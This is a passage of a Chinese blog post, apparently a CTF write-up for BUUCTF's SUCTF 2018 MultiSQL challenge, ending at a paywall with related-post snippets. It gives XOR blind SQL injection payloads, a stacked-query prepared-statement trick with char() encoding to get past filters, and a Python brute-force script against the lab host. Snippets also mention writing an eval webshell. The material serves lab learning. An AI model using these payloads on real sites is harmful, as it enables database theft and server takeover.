BUUCTF:[SUCTF 2018]MultiSQL --- 堆叠注入 -- 预处理-- 编码,10进制,16进制。

最新推荐文章于 2023-12-13 16:23:27 发布
最新推荐文章于 2023-12-13 16:23:27 发布
阅读量741 收藏 5
点赞数 1
分类专栏: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zero_Adam/article/details/115801787
版权

目录:

参考:初末

一、自己做:

这里试addslash来的
在这里插入图片描述

用户信息中,把反斜线去掉展示的
在这里插入图片描述

在注册的用户名进行测试,
将 or , by 空格| 替换成为@
union select or 都过滤了
,然后在尝试 异或^
substr也被过滤了,然后尝试mid试可以的,
但是这个不好使啊2^(if(ascii(mid(user(),1,1))>0,0,1))。注册页面不好使,然后就看WP了

二、 学到的&&不足:

  1. 有时候python脚本跑sql注入的题的时候要带上cookie。
    我这样跑,总是爆500 。见下面的

  2. 学到了sql注入的预处理命令。?id=2;set @sql=char(12,324,23,23,); prepare query from @sql; execute query;

  3. 异或的一点是,:怎么发现的 可以进行堆叠注入的啊,,

  4. 如果一些关键词被那啥了,可以进行编码绕过什么的,比如以前的那些16进制绕过,还有这个10进制绕过

url = '''http://77a4fc87-2f45-4e87-b5fe-0ea6cf054bd3.node3.buuoj.cn/user/user.php?id=1^(ascii(mid(user(),1,1))>0)'''
res = requests.get(url=url)
print(res.url)
print(res.status_code)
print(res.text)

带上cookie后才200了

url = '''http://77a4fc87-2f45-4e87-b5fe-0ea6cf054bd3.node3.buuoj.cn/user/user.php?id=1^(ascii(mid(user(),1,1))>0)'''
cookie = {
   "PHPSESSID":"514gsk3jr3pf1ubri65d5pr714"}
res = requests.get(url=url,cookies = cookie)
print(res.url)
print(res.status_code)
print(res.text)

三、学习WP:

WP:2^(if(ascii(mid(user(),1,1))>0,0,1))。这个行,但是不是在注册页面

在这里插入图片描述
可以修改id值,然后就改变页面,
我们就注入这里

用了这个if语句试可以的
在这里插入图片描述
不用像WP一样加上if,就我们正常的boll盲注就可以,

在这里插入图片描述
1^进行异或的化,正确就是0,不正确才是0,异或后是1.,这时,name会出现admin。
正确的时候是1,异或后是0,name中不是admin,是空。那么我们python脚本抓的时候,就可以抓admin这个字样

然后照着这个思想写了个python脚本

for i in range(1,15):
    for j in range(50,155):
        url = '''http://77a4fc87-2f45-4e87-b5fe-0ea6cf054bd3.node3.buuoj.cn/user/user.php?id=1^(ascii(mid(user(),{},1))={})'''.format(i,j)
        cookie = {
   "PHPSESSID":"514gsk3jr3pf1ubri65d5pr714"}
        res = requests.get(url=url,cookies = cookie) # 注意这里要带上cookie才行,不然跑脚本的化,是500
        #print(res.url)
        print(res.status_code)
        #print(res.text)
        content = re.findall('<h2>.*</h2>',res.text,re.M|re.I) # findall返回的是一个列表
        #print(content)</
最低0.47元/天 解锁文章
Zero_Adam
关注
专栏目录
[SUCTF 2018]MultiSQL-MySQL预处理
qq_61142406的博客
05-26 296
MySQL传统处理: 客户端准备sql语句 发送sql语句到MySQL服务器 MySQL服务器执行sql语句 服务器执行结果返回客户端 预处理基本策略: 将sql语句强制一分为二: 第一部分为前面相同命令和结构部分 第二部分为后面可变数据部分 首先将前面的sql语句发送给MySQL服务器,让其先执行溢出预处理(并没有真正的执行)第一次发送sql语句的时候将其中可变的数据部分都用一个数据占位符来表示,比如问号? 不带参数的预处理 准备预处理语句 prepare 语句名称 from “预处理sql
[SUCTF 2018]MultiSQL
最新发布
m0_64849639的博客
08-12 312
MYSQL预处理堆叠注入
BUUCTF:[SUCTF 2018]MultiSQL
末初的CSDN博客
04-01 2433
BUUCTF:[SUCTF 2018]MultiSQL 两个地方存在漏洞,注册存在二次注入,在登录的时候触发。用户信息?id存在盲注,flag不在数据库当中,需要利用注入getshell 二次注入我没有成功getshell,先看?id,注册一个用户,登入查看信息 ?id=2^(if(ascii(mid(user(),1,1))>0,0,1))判断存在注入 ...
BUUCTF--[SUCTF 2018]MultiSQL
qq_46263951的博客
07-28 419
进入之后是这样的页面,我们先来注册一个帐号 查看用户信息 在?id=后存在一个sql盲注,我们来尝试一下?id=2^(if(ascii(mid(user(),1,1))>0,0,1))判断存在注入,2异或0还是为2 经过fuzz测试后发现这里过滤了union,select ,&,|,过滤了select然后存在堆叠注入的可以使用预处理注入,尝试写入shell,因为过滤了select等字符,使用char()绕过,需要执行的语句select '<?php eval($_POST[.
[SUCTF 2018]MultiSQL(mysql预编译)
paidx0
07-12 401
[SUCTF 2018]MultiSQL(mysql预编译)
cifar-10-binary.zip 二进制文件
11-19
CIFAR-10二进制文件是一种广泛用于计算机视觉任务的数据集,它是由Alex Krizhevsky、Ilya Sutskever和Geoffrey Hinton在2009年创建的。这个数据集主要由10个类别的小型彩色图像组成,包括飞机、汽车、鸟类、猫、鹿、...
flow command conversion_Flow-X485通讯_labview485_labview十六进制_字符串;十
10-01
为了将字符串指令转换为十六进制,我们可以使用LabVIEW的“ASCII toHex”函数,这个函数可以将ASCII编码的字符串转换成十六进制数值。如果字符串包含非ASCII字符或者需要特殊处理的指令,可能需要自定义VI(虚拟仪器...
SPIR-V-Blast:将类似C的语言转换为二进制或人类可读的SPIR-V
02-02
将类C语言转换为二进制或人类可读的SPIR-V。 。 要编译此工具,请参阅。 关于语言 这种语言就像“重新发明的轮子”。 现在,这种语言可以: 使用预处理程序定义和包含。 使用基本类型。 使用枚举。 处理结构。...
matlab.zip_2PSK解调_2psk通信_A-law_pcm_moodf3t_pcm编码译码
09-20
最后,"sigexpand.m"可能涉及到信号的扩展或预处理,可能用于将编码后的二进制数据转换成适合调制的信号形式。 综上所述,这个压缩包文件提供了无线通信系统中2PSK调制解调、A-law PCM编码解码的完整模拟流程,对于...
[SUCTF 2018]MultiSQL(预处理)
qq_62046696的博客
12-31 1049
通过命令获得flag ,可能是我做题少吧,第一次 看见sql中采用预处理然后写入webshell,最后得flag,反过来分析,通过上传文件给了一个可读写权限得路径,一步步收集信息,只能说自己太菜了。wp是通过盲注,然后一个个读取user.php的源码,我简单的跑了一下半个小时也跑不出来,所以我觉得这种方法并不太实用。异或可以然后试试,发现呃呃呃应该是过滤了,fuzz发现就剩了几个符号包括分号,想到了堆叠注入分号链接。为什么有写入权限呢,因为文件上传都是传到了这个目录的里面,所以有可写的权限。
buu-[SUCTF 2018]MultiSQL
qaq517384的博客
10-23 279
打开环境,只有登录和注册界面,admin已存在,随便注册一个算了 登录后有两个选项 头像界面就是一个文件上传,象征性的传一张,得到一个文件夹,可以正常访问 用户信息界面还有url的user/user.php?id=2 很明显的sql注入(如果考点是注入的话) 看一眼题目,然后默默的吧id改成1,能看到admin但是没有用 测了一下字符型和整形注入都没回显 脚本不知道为什么没有返回值,浏览器是能成功访问的 ?id=1^(ascii(mid(user(),1,1))>0) 就手注了一下user()是
[SUCTF 2018]MultiSQL-MySQL预处理学习
cjdgg的博客
05-11 430
[SUCTF 2018]MultiSQL-MySQL预处理学习 进入题目后,注册账户登录 编辑头像可以上传文件,但是上传了php文件还是会变成jpg格式 再看用户信息这里,id=2那里可以随意更改,存在越权,1就是admin 这里接下来要用到MySQL预处理,参考文章 set MariaDB [(none)]> set @a='select version()'; Query OK, 0 rows affected (0.00 sec) MariaDB [(none)]> select
buuctf-web-[SUCTF 2018]MultiSQL1
mlws1900的博客
03-11 600
flag{1cc63c44-f1b0-40c0-a64e-fdc8bfe4f503}删删改改四五回,哥们只是想混个勋章,太折磨人了,看到我文章有罗里吧嗦的地方见谅,我其他文章都是以精简为主,不在乎文章分数,为了这个勋章,我只好车轱辘话转来转去(这一段就是这个作用)可以读/var/www/html/index.php文件,读取/var/www/html/user/user.php文件(这种方法跑十几分钟也跑不出来)存在各种限制,select,union,直接用char绕过(太菜,用其他绕过写马失败)
[SUCTF 2018]MultiSQL MYSQL 预处理
m0_64180167的博客
12-13 837
然后我们开始fuzz 发现 select ,union 都没了。首先这道题需要预处理写马 之前在ctfshow中学习过预处理。发现可以闭合 所以这里是存在堆叠注入的。这里就实现了绕过 并且执行了命令。首先我们开始判断是否存在注入。所以我们看看能不能写木马。
堆叠注入——BUUCTF-随便注
ancan8807的博客
09-07 672
由题目提示知道,这题需要进行sql注入 输入1'发现报错 再输入1';show batabases#出现了一大堆数据库 再输入1';show tables#出现了两个表 猜测flag在这2个表中,输入1';show create table `1919810931114514`;尝试打开表1,发现 因为select被过滤了,所以先将select *...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值